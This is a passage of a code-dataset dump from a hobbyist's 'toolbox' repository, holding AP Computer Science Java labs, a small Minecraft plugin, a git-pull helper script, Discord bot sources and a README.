String[] n = in;\n for (int i = 0; i < n.length; i++) {\n n[i] = \"Betty\";\n }\n return n;\n }\n} //END OF CLASS"
},
{
"alpha_fraction": 0.7803738117218018,
"alphanum_fraction": 0.7803738117218018,
"avg_line_length": 20.5,
"blob_id": "71ff3ed07c293abbc5667e602bad588cc86fda35",
"content_id": "883e67ef1eb39066c093be8be3e93c3c17f73125",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 214,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 10,
"path": "/Java/MinecraftPlugins/AlylTroll/src/main/java/me/zenisbestwolf/AlylTroll/Main.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "package me.zenisbestwolf.AlylTroll;\n\nimport org.bukkit.plugin.java.JavaPlugin;\nimport me.zenisbestwolf.AlylTroll.Listeners.*;\n\npublic class Main extends JavaPlugin{\n\tpublic void onEnable() {\n\t\tnew Music(this);\n\t}\n}"
},
{
"alpha_fraction": 0.656000018119812,
"alphanum_fraction": 0.6940000057220459,
"avg_line_length": 37.5,
"blob_id": "4d86d4d65b55694682bf6b574ee8d362406e50cf",
"content_id": "2afda805c4f1f7968ab2f13c9fe360d0dd191dc5",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1000,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 26,
"path": "/Java/APCSA/Lab02bvst.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Lab02bvst.java\n// The Mortgage Payment Program\n// This the student, starting version of the Lab02b assignment.\n// Redacted\n\npublic class Lab02bvst\n{\n\tpublic static void main(String[] args)\n\t{\n\t\tSystem.out.println(\"Lab02b, Student Version\\n\");\n\t\tdouble principal = 250000;\n\t\tdouble annualRate = 4.85;\n\t\tdouble numYears = 30;\n\t\tdouble months = numYears*12.0;\n\t\tdouble mR = (annualRate/12.0)/100.0;\n\t\tdouble powerBall = Math.pow(mR+1,months);\n\t\tdouble monthlyPayment = (mR*powerBall/(powerBall-1.0))*principal;\n\t\tdouble roundedMonthlyPayment = Math.ceil(monthlyPayment*100)/100;\n\t\tSystem.out.println(\"Principal: $\" + principal);\n\t\tSystem.out.println(\"Annual Rate: \" + annualRate + \"%\");\n\t\tSystem.out.println(\"Years: \" + numYears);\n\t\tSystem.out.println(\"Monthly Payment: $\" + roundedMonthlyPayment);\n\t\tSystem.out.println(\"Total Payment: $\" + roundedMonthlyPayment * months);\n\t\tSystem.out.println(\"Total Interest: $\" + (roundedMonthlyPayment * months - principal));\n\t}\n}"
},
{
"alpha_fraction": 0.4970308840274811,
"alphanum_fraction": 0.536223292350769,
"avg_line_length": 29.90825653076172,
"blob_id": "6c762e55f75597710caaaa4128e6a21b4864560f",
"content_id": "3298541b373be6cc2d08f1aa38819e9c08dfba9f",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 3368,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 109,
"path": "/Java/APCSA/Lab05a2vst.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Lab05a2vst.java\n// The Rational Class Program II\n// This is the student starting version of the Lab05a2 assignment.\nimport java.util.*;\npublic class Lab05a2vst {\n public static void main(String[] args) {\n Scanner s1 = new Scanner(System.in);\n Scanner s2 = new Scanner(System.in);\n Scanner s3 = new Scanner(System.in);\n Scanner s4 = new Scanner(System.in);\n System.out.print(\"\\nEnter the 1st numerator ----> \");\n int num1 = s1.nextInt();\n System.out.print(\"\\nEnter the 1st denominator --> \");\n int den1 = s2.nextInt();\n System.out.print(\"\\nEnter the 2nd numerator ----> \");\n int num2 = s3.nextInt();\n System.out.print(\"\\nEnter the 2nd denominator --> \");\n int den2 = s4.nextInt();\n System.out.println();\n\n Rational r1 = new Rational(num1, den1);\n Rational r2 = new Rational(num2, den2);\n Rational r3 = new Rational();\n\n r3.showMultiply(r1, r2); // required for 80-points\n r3.showDivide(r1, r2); // required for 80-points\n r3.showAdd(r1, r2); // required for 100-points\n r3.showSubtract(r1, r2); // required for 100-points\n }\n}\n\nclass Rational {\n private int num;\n private int den;\n\n // Required for 80-points\n public Rational() {\n num = 0;\n den = 0;\n }\n\n // Required for 80-points\n public Rational(int n, int d) {\n num = n;\n den = d;\n }\n\n // Required for 80-points\n public String getRational() {\n return \"\" + num + \"/\" + den;\n }\n\n // Required for 80-points\n private int getGCF(int n1, int n2) {\n int remainder = 1;\n int gcf = 1;\n while (remainder != 0) {\n remainder = n1 % n2;\n if (remainder == 0) {\n gcf = n2;\n } else {\n n1 = n2;\n n2 = remainder;\n }\n }\n return gcf;\n }\n\n // Required for 80-points\n public String getReduced(int n, int d) {\n int gcf = getGCF(n, d);\n int rNum = n / gcf;\n int rDen = d / gcf;\n return \"\" + rNum + \"/\" + rDen;\n }\n\n // Required for 80-points\n public void showMultiply(Rational r1, Rational r2) {\n int newN = r1.num * r2.num;\n int newD = r1.den * r2.den;\n System.out.println(r1.getRational() + \" * \" + r2.getRational() + \" = \" + getReduced(newN, newD) + \"\\n\");\n }\n\n // Required for 80-points\n public void showDivide(Rational r1, Rational r2) {\n int newN = r1.num * r2.den;\n int newD = r1.den * r2.num;\n System.out.println(r1.getRational() + \" / \" + r2.getRational() + \" = \" + getReduced(newN,newD) + \"\\n\");\n }\n\n // Required for 100-points\n public void showAdd(Rational r1, Rational r2) {\n int tN1 = r1.num * r2.den;\n int tN2 = r2.num * r1.den;\n int newD = r1.den * r2.den;\n int newN = tN1 + tN2;\n System.out.println(r1.getRational() + \" + \" + r2.getRational() + \" = \" + getReduced(newN, newD) + \"\\n\");\n }\n\n // Required for 100-points\n public void showSubtract(Rational r1, Rational r2) {\n int tN1 = r1.num * r2.den;\n int tN2 = r2.num * r1.den;\n int newD = r1.den * r2.den;\n int newN = tN1 - tN2;\n System.out.println(r1.getRational() + \" - \" + r2.getRational() + \" = \" + getReduced(newN, newD) + \"\\n\");\n }\n\n}"
},
{
"alpha_fraction": 0.4658302962779999,
"alphanum_fraction": 0.49125123023986816,
"avg_line_length": 28.134614944458008,
"blob_id": "80c39f5bdb7788f356d018becd64d07ab772e4cc",
"content_id": "ce2dce5f45585bfa52765a3b46194519b1d08b08",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 3029,
"license_type": "permissive",
"max_line_length": 126,
"num_lines": 104,
"path": "/Java/APCSA/Lab06/Lab06bvst.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Lab06bvst.java\n// This is the student starting file of Lab06a.\n\npublic class Lab06bvst\n{\n public static void main (String[] args)\n {\n System.out.println(\"Lab06bv100 by Redacted\\n\");\n int size = 10;\n School bhs = new School(size);\n String[] names = {\"R\",\"e\",\"d\",\"a\",\"c\",\"t\",\"e\",\"d\",\"!\",\"!!\"};\n int[] ages = {19,23,15,47,27,65,15,19,14,14};\n double[] gpas = {0.4,3.8,4.0,3.0,3.7,2.8,3.9,4.4,3.7,4.0};\n for (int i=0;i<10;i++)\n bhs.addData(names[i], ages[i], gpas[i]);\n System.out.println(\"Original:\\n\" + bhs);\n bhs.bubbleSortGPA();\n System.out.println(\"Bubble Sort by GPA:\\n\" + bhs);\n bhs.bubbleSortAge();\n System.out.println(\"Bubble Sort by Age:\\n\" + bhs);\n bhs.bubbleSortName();\n System.out.println(\"Bubble Sort by Name:\\n\" + bhs);\n } \n}\n\nclass School\n{\n private Student[] students;\n private int size;\n private int used = 0;\n \n public School (int s)\n {\n size = s;\n students = new Student[size];\n }\n \n public void addData(String name, int age, double gpa)\n {\n Student tmp = new Student(name, age, gpa);\n if (used >= size) {\n System.out.println(\"addData of \\\"\" + name + \"\\\" failed, school is full.\");\n } else {\n students[used] = tmp;\n used++;\n }\n } \n public void bubbleSortGPA() {\n boolean sorted = false;\n while (sorted == false) {\n boolean flip = true;\n for (int i=0;i<students.length-1;i++) {\n if (students[i].getGPA() > students[i+1].getGPA()) {\n Student tmp = students[i];\n students[i] = students[i+1];\n students[i+1] = tmp;\n flip = false;\n }\n }\n if (flip == true)\n sorted = true;\n }\n }\n public void bubbleSortAge() {\n boolean sorted = false;\n while (sorted == false) {\n boolean flip = true;\n for (int i=0;i<students.length-1;i++) {\n if (students[i].getAge() > students[i+1].getAge()) {\n Student tmp = students[i];\n students[i] = students[i+1];\n students[i+1] = tmp;\n flip = false;\n }\n }\n if (flip == true)\n sorted = true;\n }\n }\n public void bubbleSortName() {\n boolean sorted = false;\n while (sorted == false) {\n boolean flip = true;\n for (int i = 0; i < students.length - 1; i++) {\n if (students[i].getName().substring(0,1).compareTo(\"A\") > students[i+1].getName().substring(0,1).compareTo(\"A\")) {\n Student tmp = students[i];\n students[i] = students[i + 1];\n students[i + 1] = tmp;\n flip = false;\n }\n }\n if (flip == true)\n sorted = true;\n }\n }\n public String toString()\n {\n String ret = \"\";\n for (int i=0;i<students.length;i++)\n if (students[i] != null)\n ret = ret + students[i];\n return ret;\n }\n}"
},
{
"alpha_fraction": 0.745064377784729,
"alphanum_fraction": 0.750643789768219,
"avg_line_length": 65.57142639160156,
"blob_id": "7d1f9c1ab84bc20de259638915c4287e813c635b",
"content_id": "a240f2ec13ef8e4331ec3ce1848bb1e65b37196f",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2330,
"license_type": "permissive",
"max_line_length": 310,
"num_lines": 35,
"path": "/README.md",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "# toolbox\nRandom scripts and old code I like to keep around. This also serves as an archive for my older code that I sometimes reference but don't host on GitHub anymore.\n\nShould no license be found in the folder in which the code is contained, it is Public Domain (falls under The Unlicense), otherwise please respect the License file included.\n\n## Directory\n\n- Python\n\t- Sort.py\n\t - Prints a sorted by size (descending) list of folders within the given directory.\n\t- PullAll.py\n\t - Runs git pull on all subdirectories where the script is located.\n- Java\n\t- APCSA - All files in here are misc. pieces of Java that I have written for the AP Computer Science A course I completed in the 2019-2020 school year.\n\t- MinecraftPlugins\n\t\t- canyoudumbass\n\t\t\t- Screams at you for placing and breaking blocks, basically just a testing ground for getting block info.\n\t\t- AlylTroll\n\t\t\t- This was a plugin used to tell people when a user played a Disc, for trolling purposes.\n- JavaScript\n\t- DiscordBots\n\t\t- THANOS\n\t\t\t- A small bot I used for fun and wanted to turn into a usable thing, I think? It was at the height of Thanos snapping memes.\n\t\t- furbley\n\t\t\t- Completely do not remember what this was used for. AFAIK it appears to be a direct rip of my bot [Furrtron](https://github.com/ZenIsBestWolf/furrtron) but I included it anyways.\n\t\t- furrtron-test\n\t\t\t- Testing grounds for my bot [Furrtron](https://github.com/ZenIsBestWolf/furrtron), probably one of my best Discord bots for the time. The regular bot is archived at the link provided.\n\t\t- gerald-bot\n\t\t\t- Yet another bot I do not remember creating, at all! I guess this is from May 2020, yet I have 0 recollection of creating it then. It seems to do fuck all.\n\t\t- maddie-test\n\t\t\t- The testing grounds for my first ever Discord bot, [Maddie](https://github.com/ZenIsBestWolf/maddie-bot) which is in archive here on GitHub still. This is how I learned JS, NodeJS, DiscordJS, and got my first real foot into programming. Thank you so much to An Idiot's Guide who taught me this on YouTube.\n\t\t- skid-bot & skid-bot-test\n\t\t\t- I grouped these since they're similar. This was a bot for a server I was trying to make and is similar to [Furrtron](https://github.com/ZenIsBestWolf/furrtron). The \"-test\" version is obviously the testing grounds.\n\t\t- crimp-bot\n\t\t\t- A bot I made for a friend.\n"
},
{
"alpha_fraction": 0.5906228423118591,
"alphanum_fraction": 0.6137158870697021,
"avg_line_length": 46.650001525878906,
"blob_id": "6ca14d4cc9c6294b1c55dfccb9d59874ad209479",
"content_id": "9b46f1923f2b54b6c6612facf136aa17838e92e7",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 2858,
"license_type": "permissive",
"max_line_length": 132,
"num_lines": 60,
"path": "/Java/APCSA/Lab03vst.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Lab03vst.java\n// The Speeding Ticket Program\n// This the student starting file for Lab03.\nimport java.util.Scanner;\npublic class Lab03vst\n{\n\tpublic static void main(String[] args)\n\t{\n System.out.println(\"Redacted Classmate & Redacted\");\n\t\t System.out.println(\"Lab03, Student Starting Version\\n\");\n System.out.println(\"Speeding Ticket Program\");\n double postedSpeed,goingSpeed,ticket,speedDifference;\n String isSchoolZone,isWorkZone,wasWorkerHit;\n ticket = 0.0;\n Scanner intKeyboard = new Scanner(System.in);\n Scanner strKeyboard = new Scanner(System.in);\n System.out.print(\"Enter posted speed limit ==> \");\n postedSpeed = intKeyboard.nextInt();\n System.out.print(\"Enter actual driving speed ==> \");\n goingSpeed = intKeyboard.nextInt();\n speedDifference = goingSpeed - postedSpeed;\n System.out.println(\"You drove \" + speedDifference + \" over the speed limit.\");\n if (goingSpeed > postedSpeed) {\n ticket+=75.0;\n System.out.println(\"You will receive a speeding ticket.\\nThe minimum ticket is $75.00\");\n }\n System.out.println(\"\\nTicket so far: \" + ticket + \"\\n\");\n System.out.println(\"Any driving speed higher than 5 miles over the limit\\nadds $10.00 for each mile over the speed limit.\");\n if (speedDifference > 5.0) {\n ticket+=(speedDifference*10.0);\n }\n System.out.println(\"\\nTicket so far: \" + ticket + \"\\n\");\n System.out.println(\"Any speeding in a school zone doubles the ticket amount.\");\n System.out.print(\"Did speeding happen in a school zone ==> \");\n isSchoolZone = strKeyboard.nextLine();\n if (isSchoolZone.compareToIgnoreCase(\"y\") == 0) {\n ticket*=2.0;\n }\n System.out.println(\"\\nTicket so far: \" + ticket + \"\\n\");\n System.out.println(\"Any speeding in a work zone doubles the ticket amount.\");\n System.out.print(\"Did speeding happen in a work zone ==> \");\n isWorkZone = strKeyboard.nextLine();\n if (isWorkZone.compareToIgnoreCase(\"y\") == 0) {\n ticket*=2.0;\n }\n System.out.println(\"\\nTicket so far: \" + ticket + \"\\n\");\n System.out.println(\"Hitting a worker adds $10000.00 to the ticket.\");\n System.out.print(\"Was a worker hit in a work zone ==> \");\n wasWorkerHit = strKeyboard.nextLine();\n if (wasWorkerHit.compareToIgnoreCase(\"y\") == 0) {\n ticket+=10000.0;\n }\n System.out.println(\"\\nTicket so far: \" + ticket + \"\\n\");\n System.out.println(\"Driving more than 80mph is considered reckless.\\nThis adds $100.00 for every mile over 80 MPH.\");\n if (goingSpeed > 80.0) {\n ticket+=(goingSpeed - 80.0) * 100.0;\n }\n System.out.println(\"\\nYour total ticket is $\" + ticket);\n } \n}"
},
{
"alpha_fraction": 0.6569548845291138,
"alphanum_fraction": 0.6569548845291138,
"avg_line_length": 34.5,
"blob_id": "630eb04853a5aa68a3ac72c7e13bffa0a5422734",
"content_id": "da34006dafc3770583ce419be216da120b0b5be1",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1064,
"license_type": "permissive",
"max_line_length": 188,
"num_lines": 30,
"path": "/Java/MinecraftPlugins/AlylTroll/src/main/java/me/zenisbestwolf/AlylTroll/Listeners/Music.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "package me.zenisbestwolf.AlylTroll.Listeners;\n\nimport org.bukkit.Bukkit;\nimport org.bukkit.event.EventHandler;\nimport org.bukkit.event.Listener;\nimport org.bukkit.event.player.PlayerInteractEvent;\nimport org.bukkit.entity.Player;\nimport org.bukkit.event.block.Action;\n\nimport me.zenisbestwolf.AlylTroll.Main;\n\npublic class Music implements Listener {\n private static Main plugin;\n public Music(Main plugin) {\n this.plugin = plugin;\n Bukkit.getPluginManager().registerEvents(this, plugin);\n }\n \n @EventHandler\n public void onPlay(PlayerInteractEvent e) {\n String alyl = \"Alyl\";\n if (e.getPlayer().getName().equals(alyl) && e.getClickedBlock().getType().toString().equals(\"JUKEBOX\") && e.getAction() == Action.RIGHT_CLICK_BLOCK && e.getMaterial().isRecord()) {\n for(Player p : plugin.getServer().getOnlinePlayers()) {\n if (p.hasPermission(\"fuck.off\")) {\n p.sendMessage(\"Alyl has begun playing \" + e.getMaterial().toString());\n }\n }\n }\n }\n}"
},
{
"alpha_fraction": 0.6698564887046814,
"alphanum_fraction": 0.6722487807273865,
"avg_line_length": 31.153846740722656,
"blob_id": "faa42070e6170b9c6bff2c4a0428dd813ae9128d",
"content_id": "373cf58fb2518ae3327dae0659cf6742da22bade",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 418,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 13,
"path": "/Python/PullAll.py",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "# Runs git pull on all subdirectories where the script is located.\nimport os\nprint(\"Running git pull on all subdirectories...\")\ntmpfol = []\nfor r, d, f in os.walk(os.curdir): # Walk around the directory.\n\ttmpfol.append(d) # Only add the folders in the directory.\nfolders = tmpfol[0]\nfor i in folders:\n os.chdir(i)\n print(\"Running git pull on \" + i)\n os.system(\"git pull\")\n print(\"Done\")\n os.chdir(\"..\")\n"
},
{
"alpha_fraction": 0.6013237237930298,
"alphanum_fraction": 0.6163130402565002,
"avg_line_length": 24.94444465637207,
"blob_id": "d54ff3c6481b2d88dd7b10f54a98e2516ef42145",
"content_id": "1c74e7594c65131bc610492af72a9a6982b99a75",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 5143,
"license_type": "permissive",
"max_line_length": 264,
"num_lines": 198,
"path": "/JavaScript/DiscordBots/maddie-test/switch.js",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "const Discord = require('discord.js');\nconst client = new Discord.Client();\nvar token = \"redacted\";\nclient.on('ready', () => {\n\tconsole.log('Online. The default global prefix is: ' + prefix);\n\tclient.user.setGame('with Landen\\'s coffee!');\n});\nprocess.on('unhandledRejection', console.error);\nvar prefix = '!';\nvar zen = \"183672121522782208\";\nvar jc = \"359539469231063052\";\nvar lg = \"359538295375659010\";\nclient.on('guildMemberAdd', member => {\n\tlet guild = member.guild;\n\tif (guild.id === lg) {\n\t\tguild.channels.get(jc).send(\"User \" + member + \" has joined.\")\n\t};\n});\nclient.on('guildMemberRemove', member => {\n\tlet guild = member.guild;\n\tif (guild.id === lg) {\n\t\tguild.channels.get(jc).send(\"User \" + member + \" has left.\")\n\t};\n});\nclient.on('guildBanAdd', (guild, user) => {\n\tif (guild.id === lg) {\n\t\tguild.channels.get(jc).send(\"User \" + user + \" has been banned.\")\n\t};\n});\nclient.on('message', message => {\n\tif (!message.content.startsWith(prefix)) return;\n\tif (message.author.bot) return;\n\tvar args = message.content.substring(prefix.length).split(\" \");\n\tvar embarrassedarray = [\"./src/embarrassed/embarrassedkat.png\", \"./src/embarrassed/embarrassedmike.png\", \"./src/embarrassed/embarrassedkeith.png\"];\n\tvar kekarray = [\"./src/kek/kekzen.png\" // This is so in the future when I get more KEK images, I can just add them with ease.\n\t];\n\tvar smugarray = [\"./src/smug/smugzen.png\", \"./src/smug/smugflora.png\"];\n\tswitch (args[0]) {\n\t\tcase \"angrykeith\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/angrykeith.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"coffee\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/coffee.gif\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"embarrassed\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: embarrassedarray[Math.floor(Math.random() * embarrassedarray.length)]\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"happy\":\n\t\t\tmessgae.channel.send({\n\t\t\t\tfile: \"./src/happy.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"help\":\n\t\t\tmessage.author.send(\"```!angrykeith\\n!coffee\\n!embarrassed\\n!happy\\!help\\!jerks\\n!kek\\n!northkinds\\n!profanity\\n!really\\n!rekt\\n!ripchat\\n!shhh\\n!shook\\n!smug\\n!source\\n!topkek\\n!triforce\\n!triggered\\n!wat```\\nHave suggestions? DM them to ZenIsBestWolf#0446!\");\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"jerks\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/jerks.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"kek\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: kekarray[Math.floor(Math.random() * kekarray.length)]\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"lenny\":\n\t\t\tmessage.channel.send(\"( ͡° ͜ʖ ͡°)\");\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"northkinds\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/northkinds.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"profanity\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/profanity.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"really\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/really.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"rekt\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/rekt.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"ripchat\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/ripchat.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"shhh\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/shhh.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"shook\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/shook.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"smug\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: smugarray[Math.floor(Math.random() * smugarray.length)]\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"source\":\n\t\t\tmessage.reply(\"Maddie is open sourced bot by ZenIsBestWolf, and is free to modify on GitHub. Check her repository out here: https://github.com/ZenIsBestWolf/maddie-bot.\");\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"topkek\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/topkek.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"triforce\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/triforce.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"triggered\":\n\t\t\tmessgae.channel.send({\n\t\t\t\tfile: \"./src/triggered.gif\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t\tcase \"wat\":\n\t\t\tmessage.channel.send({\n\t\t\t\tfile: \"./src/wat.png\"\n\t\t\t});\n\t\t\tmessage.delete();\n\t\t\tbreak;\n\t};\n\tif (message.author.id === zen) {\n\t\tswitch (args[0]) {\n\t\t\tcase \"chat\":\n\t\t\t\tvar msg = args.join(' ').slice(args[0].length);\n\t\t\t\tmessage.channel.send(msg);\n\t\t\t\tmessage.delete();\n\t\t\t\tbreak;\n\t\t\tcase \"chatin\":\n\t\t\t\tvar targ = args[1]\n\t\t\t\tvar msg = args.join(' ').slice(args[0].length + args[1].length + 1)\n\t\t\t\tclient.channels.get(targ).send(msg);\n\t\t\t\tmessage.delete();\n\t\t\t\tbreak;\n\t\t\tcase \"nick\":\n\t\t\t\tvar nick = args.join(' ').slice(args[0].length);\n\t\t\t\tmessage.guild.me.setNickname(nick);\n\t\t\t\tmessage.delete();\n\t\t\t\tbreak;\n\t\t\tcase \"perm\":\n\t\t\t\tvar perm = args[1];\n\t\t\t\tif (message.guild.me.hasPermission(perm)) {\n\t\t\t\t\tmessage.reply(\"True.\").then(e => setTimeout(function() {\n\t\t\t\t\t\te.delete();\n\t\t\t\t\t}, 10000));\n\t\t\t\t\tmessage.delete();\n\t\t\t\t} else {\n\t\t\t\t\tmessage.reply(\"False.\").then(e => setTimeout(function() {\n\t\t\t\t\t\te.delete();\n\t\t\t\t\t}, 10000));\n\t\t\t\t\tmessage.delete()\n\t\t\t\t};\n\t\t\t\tbreak;\n\t\t\tcase \"shutdown\":\n\t\t\t\tprocess.exit();\n\t\t\t\tbreak;\n\t\t};\n\t};\n});\nclient.login(token);\n"
},
{
"alpha_fraction": 0.6071082353591919,
"alphanum_fraction": 0.6138933897018433,
"avg_line_length": 31.589473724365234,
"blob_id": "90352ca85b5229f8015e1b9211f74597ea18b9a9",
"content_id": "0724c725372907b726328cd52bf3d30550452193",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3095,
"license_type": "permissive",
"max_line_length": 199,
"num_lines": 95,
"path": "/JavaScript/DiscordBots/gerald-bot/index.js",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Semicolon continuity is based on Java requirements.\nconst Discord = require('discord.js');\nconst { inspect } = require('util')\nconst client = new Discord.Client({disableMentions: \"everyone\"});\nconst commandList = require('./commands.json');\nconst config = require('./config.json');\nconst prefix = config.prefix; // redundant but i am so used to this so i need this\nclient.on('ready', () => {\n console.log(\"Online and ready to go. Prefix is set to \" + prefix);\n client.user.setActivity(\"sup lmao\");\n //client.users.resolve(config.developerAccount).send(\"Rebooted. Prefix is currently set to: \" + prefix);\n})\nprocess.on('unhandledRejection', error => {\n console.log(error.stack);\n client.users.resolve(config.developerAccount).send(error.stack).catch(e => {\n client.users.resolve(config.developerAccount).send(\"An error occurred, however I could not send it.\");\n console.log(\"Could not send to the designated developer account for some reason. (Message was likely too long!)\");\n })\n})\nclient.on('message', message => {\n if (!message.content.startsWith(prefix)) return;\n if (message.author.bot) return;\n if (message.channel.type == \"dm\") {\n message.channel.send(\"can you do this stuff in a server please\");\n return;\n }\n var args = message.content.substring(prefix.length).split(\" \");\n var command = commandList[args[0].toLowerCase()];\n var permissionSet = [0,0];\n for (let i = 0; i < config.overrideUsers.length; i++) if (message.author.id == config.overrideUsers[i]) permissionSet = [1,2];\n for (let i = 0; i < config.staffRoles.length; i++) if (message.member.roles.cache.has(message.member.guild.roles.cache.findKey(role => role.name === config.staffRoles[i]))) permissionSet = [0,1];\n if (message.member.guild.ownerID === message.author.id) permissionSet = [0,2];\n // bot time\n if (args[0] == \"check\") {\n message.reply(\"Checking if you have a role called \" + args[1]);\n let checkStat = message.member.roles.cache.has(message.member.guild.roles.cache.findKey(role => role.name === args[1]));\n message.reply(\"Got: \" + checkStat);\n console.log(checkStat);\n }\n if (args[0] == \"eval\") {\n if (permissionSet[1] < 1) {\n message.reply(\"You do not have permission to run this. This is GLOBAL command asking for level 1. You are GLOBAL level 0.\");\n return;\n }\n let toEval = args.join(\" \").slice(args[0].length);\n try {\n var evaluated = inspect(eval(toEval, { depth: 0 }));\n }\n catch(e) {\n message.reply(`something fucked up while evaluating: ${e.message}`);\n }\n try {\n if (!toEval) {\n message.reply(\"i can't evaluate air dumbass\");\n } else {\n message.reply(\"ok heres what happened\");\n message.channel.send(`\\`\\`\\`JavaScript\\n${evaluated}\\n\\`\\`\\``)\n }\n } catch(e) {\n console.log(\"Could not evaluate: \" + e.message);\n }\n }\n})\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclient.login(\"redacted\");"
},
{
"alpha_fraction": 0.6049792766571045,
"alphanum_fraction": 0.6062240600585938,
"avg_line_length": 39.18333435058594,
"blob_id": "e833a1646ffa0140b6f2f39a5395c0b3caf705ef",
"content_id": "fd4595c663e18b91c4609fe05efa4b75865d6091",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2436,
"license_type": "permissive",
"max_line_length": 334,
"num_lines": 60,
"path": "/JavaScript/DiscordBots/crimp-bot/index.js",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
